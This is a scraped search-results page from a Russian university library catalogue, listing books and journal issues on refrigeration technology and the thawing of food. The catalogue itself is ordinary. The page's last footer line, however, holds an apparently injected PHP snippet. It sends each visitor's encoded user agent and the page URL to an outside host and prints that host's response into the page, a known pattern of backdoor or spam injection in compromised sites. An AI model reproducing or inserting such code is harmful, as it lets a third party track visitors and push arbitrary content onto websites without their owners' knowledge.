Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

102 пользователей


Зарегистрированных: 1 

Федоров Владимир Леонидович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РАЗМОРАЖИВАНИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 12
1. 
Холодильная технология пищевых продуктов [Текст] : учеб. для вузов по специальности 260504 (270800) "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов социального назначения и общественного питания" : в 3 ч. Ч. 1 : Теплофизические основы / А. В. Бараненко [и др.], 2008. - 221, [1] с.
Держатели документа (Информация об экземплярах) 

В учебнике рассмотрены способы хранения при холодильной обработке, изучены требования в режимам отепления, размораживания и проанализированы способы определения теплофизических, электрических и механических характеристик для пищевых продуктов.

2. 
Примеры расчетов по курсу "Холодильная техника" [Текст] : учеб. пособие по специальности "Машины и аппараты пищевых производств" / Г. Д. Аверин [и др.] ; под ред. Н. Д. Маловой, 1986. - 181, [2] с.
Держатели документа (Информация об экземплярах) 
3. 
Филиппов, Валерий Иванович. Технологические основы холодильной технологии пищевых продуктов [Текст] / В. И. Филиппов, М. И. Кременевская, В. Е. Куцакова, 2014. - 571, [1] с.
Держатели документа (Информация об экземплярах) 

В учебнике рассматриваются технологические аспекты процессов холодильного консервирования пищевых продуктов. Изложены состав и свойства пищевых продуктов, значение микроорганизмов при холодильном консервировании, технологические режимы холодильной обработки, отепления, размораживания, условия хранения и транспортирования различных видов сырья и продуктов их переработки. Приведены технические средства, применяемые в современной холодильной технологии пищевых продуктов.

Книга предназначена для студентов, магистрантов и аспирантов вузов, а также научных и инженерно-технических работников пищевых отраслей.

4. 
Пищевая промышленность. - Журнал, 2004г. № 3
Оглавление 
  • Абрамова, Л. С. Пути рационального использования сырьвых ресурсов рыбного хозяйства страны / Л. С. Абрамова. - с.6-10
    Кл. слова: Хозяйство рыбное
  • Сантарович, Е. С. Видовая идентификация рыбы и рыбопродукции / Е. С. Сантарович, С. Н. Красикова, Г. А. Одоева. - с.12-13
  • Радыгина, А. Ф. Применение пищевых добавок в технологии рыбной продукции / А. Ф. Радыгина, Л. С. Абрамова. - с.14-17
  • Латин, Н. Н. Повышение качества рыбных продуктов с помощью CO2-экстрактов / Н. Н. Латин, В. М. Банашек, О. Н. Стасьева. - с.18-20
  • Воскобой, А. В. Совершенствование технологии посола рыбной продукции / А. В. Воскобой, С. Ю. Савинов, Н. А. Щедрина. - с.21-23
  • Ручьев, А. С. Скороморозильные установки для рыбо- и морепродуктов / А. С. Ручьев, Г. В. Чуприков. - с.24-26
  • Современное оборудование и технологии размораживания рыбопродукции. - с.30-31
  • Парагульгов, О. Д. Национальный союз участников алкогольного рынка / О. Д. Парагульгов. - с.36-37
    Кл. слова: СУАР
  • Сергеев, В. Н. Пищевая промышленность России в рыночной экономике (1990-2003 гг.) / В. Н. Сергеев. - с.40-44
  • Киселев, В. М. Методы исследования каналов товародвижения / В. М. Киселев. - с.50-52
  • Мандреа, А. Г. Спиртовая барда. Технология утилизации / А. Г. Мандреа. - с.54-55
  • Силаев, А. В. Розлив напитков. Теория и практика / А. В. Силаев, Е. В. Элькина, В. К. Кобелев. - с.58-61
  • Хохлов, Ф. В. Насосы, применяемые в пищевой промышленности / Ф. В. Хохлов. - с.70
  • Кирпичников, В. П. Размораживание и разогрев кулинарных полуфабрикатов в разовой упаковке / В. П. Кирпичников, М. И. Ботов, Д. М. Давыдов. - с.78-79
  • Вайсберг, О. В. Влияние расового, гендерного и возрастного факторов на сенсорное восприятие вкуса и запаха / О. В. Вайсберг, О. Г. Сулимина. - с.80-82
  • Чубенко, Н. Т. Новый стандарт на пшеничную муку и новые проблемы / Н. Т. Чубенко. - с.84-85
    Кл. слова: МУКА ПШЕНИЧНАЯ - гост
Держатели документа (Информация об экземплярах) 
5. 
Химическое и нефтегазовое машиностроение. - Журнал, 2015г. № 6
Оглавление 
  • Кунтыш, В. Б. Экспериментальное исследование аэродинамического сопротивления шахматных равносторонних пучков труб со спиральными алюминиевыми ребрами / В. Б. Кунтыш, В. В. Дударев, А. Б. Сухоцкий. - с.3-6. - Библиогр. в конце ст.
  • Систер, В. Г. Экологически чистые технологические процессы обработки материалов с помощью техники СВЧ / В. Г. Систер [и др.]. - с.6-8. - Библиогр. в конце ст.
    Другие авторы: Иванникова Е. М., Киршанкова Е. В., Гудков А. Г.
    Кл. слова: жидкое стекло, сушка, размораживание
  • Мадышев, И. Н. Оценка изменения крутящего момента струйно-барботажных контактных устройств массообменного аппарата / И. Н. Мадышев [и др.]. - с.9-11. - Библиогр. в конце ст.
    Другие авторы: Дмитриева О. С., Дмитриев А. В., Николаев А. Н.
  • Карпушкин, С. В. Оценка эффективности нагревательных плит прессов для изготовления резинотехнических изделий / С. В. Карпушкин, С. В. Карпов, А. О. Глебов. - с.12-17. - Библиогр. в конце ст.
    Кл. слова: индукционный нагрев
  • Вандышев, А. Б. Водопроницаемость мембран из палладиевого сплава В-1 в лабораторных исследованиях и мембранных устройствах / А. Б. Вандышев, В. А. Куликов. - с.18-21. - Библиогр. в конце ст.
  • Тарельник, В. Б. Повышение качества элементов уплотнительных узлов компрессорного оборудования. Часть 2 / В. Б. Тарельник, В. С. Марцинковский, В. И. Юрко. - с.22-25. - Библиогр. в конце ст.
    Кл. слова: цементация, электроэрозионное легирование, микротвердость
  • Щерба, В. Е. Обобщенный термодинамичекий подход к расчету процессов всасывания и нагнетания в насосах и в компрессорах объемного действия / В. Е. Щерба [и др.]. - с.26-29. - Библиогр. в конце ст.
    Другие авторы: Шалай В. В., Григорьев А. В., Ходорева Е. В., Павлюченко Е. А.
  • Скопинский, В. Н. Определение предельной пластической нагрузки в тройниковых соединениях трубопроводов при сложном комбинированном нагружении / В. Н. Скопинский, Н. А. Берков, Р. А. Вожов. - с.29-32. - Библиогр. в конце ст.
  • Бруяка, В. А. Методика подбора оптимальных значений параметров гидромониторных отверстий буровых долот / В. А. Бруяка. - с.33-36. - Библиогр. в конце ст.
    Кл. слова: геометрическая модель
  • Таранцева, К. Р. Комплексная оценка качества сточных вод в производстве цефалотина натриевой соли / К. Р. Таранцева, О. В. Фирсова. - с.37-41. - Библиогр. в конце ст.
  • Елагина, О. Ю. Исследование влияния деформационного старения на процесс коррозионного разрушения и субмикроструктуру низкоуглеродистых сталей для газораспределительных газопроводов / О. Ю. Елагина, Л. А. Ефименко, И. В. Волков. - с.42-45. - Библиогр. в конце ст.
  • Загидуллин, Р. Н. Составы для антикоррозионной защиты химического, нефтехимического и нефтегазового оборудования и трубопроводов / Р. Н. Загидуллин [и др.]. - с.45-48. - Библиогр. в конце ст.
    Другие авторы: Загидуллин С. Н., Ямалеев Р. Ф., Гильмутдинов А. Т.
    Кл. слова: антикоррозионный состав
Держатели документа (Информация об экземплярах) 
6. 
Некрутман, Самуил Вениаминович. Сверхбыстрая кулинария, или СВЧ-печь в вашем доме [Текст] / С. В. Некрутман, 1988. - 111 с.
Держатели документа (Информация об экземплярах) 
7. 
Чижов, Георгий Борисович. Теплофизические процессы в холодильной технологии пищевых продуктов [Текст] / Г. Б. Чижов, 1979. - 270 с.
Держатели документа (Информация об экземплярах) 
8. 
Баранов, Игорь Владимирович. Методы и средства измерения тепловых и влажностных свойств пищевых продуктов и материалов в условиях их замораживания и размораживания [Текст] : Автореф. дис. .. канд. техн. наук: 05.14.05 / И. В. Баранов, 1999. - 15 с.
Держатели документа (Информация об экземплярах) 
9. 
Холодильная техника и технология [Текст] / С. А. Большаков, В. Ф. Лебедев, А. В. Локтев, А. В. Руцкий; Под ред. А. В. Руцкого, 2000. - 285, [1] с.
10. 
Цуранов, Олег Алексеевич. Холодильная техника и технология [Текст] : Учеб. для вузов по торговым специальностям / О. А. Цуранов, А. Г. Крысин, 2004. - 446 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ПИЩЕВОЙ -- ПРОДУКТ -- МИКРОФЛОРА -- ОХЛАЖДЕНИЕ -- ЗАМОРАЖИВАНИЕ -- РАЗМОРАЖИВАНИЕ -- ИСКУССТВЕННЫЙ -- ХОЛОД -- ВИХРЕВОЙ -- ЭФФЕКТ -- ПЕЛЬТЬЕ -- ДЖОУЛЬ -- ТОМСОН -- ДЕСОРБЦИЯ -- КАРНО -- ХЛАДАГЕНТ -- ХЛАДОНОСИТЕЛЬ -- КОМПРЕССОР -- ТЕПЛООБМЕННЫЙ АППАРАТ -- КОНДЕНСАТОР -- РЕСИВЕР -- ВЕНТИЛЬ -- ФИЛЬТР -- АВТОМАТИЗАЦИЯ -- САМОРЕГУЛИРОВАНИЕ -- ОБОРУДОВАНИЕ -- ХОЛОДИЛЬНИК -- ЛЬДОГЕНЕРАТОР -- УТИЛИЗАЦИЯ -- ТЕПЛОТА -- КОНДИЦИОНИРОВАНИЕ -- ВОЗДУХ -- КОНДИЦИОНЕР -- ФРИЗЕР

Учебник состоит из 2 разделов, содержащих научную и практическую информацию из области холодильной технологии и холодильной техники. Представлен материал, касающийся специализированного торгового холодильного оборудования -фризеров мягкого мороженого, льдогенераторов, аппаратов для охлаждения и замораживания продуктов, приведены сведения о кондиционировании воздуха на предприятиях общественного питания и торговли, рассмотрены основные типы холодильного транспорта, требования к эксплуатации холодильного оборудования

11. 
Голянд, Михаил Маркович. Холодильное технологическое оборудование [Текст] : Учеб. для вузов по специальности "Технология консервирования продуктов" / М. М. Голянд, Б. Н. Малеванный, 1977. - 335 с.
Держатели документа (Информация об экземплярах) 
12. 
Сборник примеров расчетов и лабораторных работ по курсу "Холодильное технологическое оборудование" [Текст] : Учеб. пособие для вузов / М. М. Голянд, Б. Н. Малеванный, М. З. Печатников, В. Т. Плотников, 1981. - 166 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.16 запросов, 0.69c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;